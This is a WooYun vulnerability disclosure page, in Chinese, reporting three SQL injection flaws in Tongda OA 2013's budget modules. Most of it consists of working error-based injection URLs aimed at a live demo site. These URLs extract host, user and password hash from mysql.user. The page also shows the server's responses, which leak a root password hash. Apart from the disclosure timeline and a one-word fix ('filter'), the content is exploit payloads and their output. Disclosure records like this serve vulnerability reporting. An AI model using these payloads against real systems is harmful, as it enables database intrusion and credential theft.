漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0106243
漏洞标题:通达oa2013集团版注入3处
相关厂商:通达信科
漏洞作者: 路人甲
提交时间:2015-04-09 11:49
修复时间:2015-07-08 11:52
公开时间:2015-07-08 11:52
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:12
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-09: 厂商已经确认,细节仅向厂商公开
2015-04-12: 细节向第三方安全合作伙伴开放
2015-06-03: 细节向核心白帽子及相关领域专家公开
2015-06-13: 细节向普通白帽子公开
2015-06-23: 细节向实习白帽子公开
2015-07-08: 细节向公众公开
简要描述:
通达
详细说明:
官网demo登录:
http://www.day900.com/
cw登陆比较鸡肋
漏洞证明:
注入1+payload:
http://www.day900.com/general/budget/budget_process/budget_project_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1) and%20(select%201%20from%20(select%20count(*),concat((select%20concat(host,user,password)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23&YEAR=2015
返回:
请联系管理员
错误#1062: Duplicate entry 'localhostroot*91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key'
SQL语句: SELECT COUNT(BUDGET_RESULT_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='P' AND DEPT_ID IN (1) and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#) AND ALLOW = '1' AND BUDGET_YEAR ='2015'
文件:/general/budget/budget_process/budget_project_depts.php
注入2+payload:
http://www.day900.com/general/budget/budget_process/budget_month_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1)and%20(select%201%20from%20(select%20count(*),concat((select%20concat(host,user,password)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23&YEAR=2015
返回:
请联系管理员
错误#1062: Duplicate entry 'localhostroot*91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key'
SQL语句: SELECT COUNT(DISTINCT BUDGET_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='M' AND ALLOW = '1' AND DEPT_ID IN (1)and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#) AND BUDGET_YEAR ='2015'
文件:/general/budget/budget_process/budget_month_depts.php
注入3+payload:
http://www.day900.com/general/budget/budget_process/budget_quater_depts.php?DEPT_ID=1&DEPT_ID_PRIV=0&DEPT_IDS=1)and%20(select%201%20from%20(select%20count(*),concat((select%20concat(host,user,password)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 &YEAR=2015
返回:
请联系管理员
错误#1062: Duplicate entry 'localhostroot*91AF99F23C3D4ED85140D100433725DFA52BECEE1' for key 'group_key'
SQL语句: SELECT COUNT(DISTINCT BUDGET_ID) FROM BUDGET_RESULT WHERE FORMATION_WAY='M' AND ALLOW = '1' AND DEPT_ID IN (1)and (select 1 from (select count(*),concat((select concat(host,user,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#) AND BUDGET_YEAR ='2015'
文件:/general/budget/budget_process/budget_quarter_depts.php
注入3+payload:
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:1
确认时间:2015-04-09 11:50
厂商回复:
重复提交
最新状态:
暂无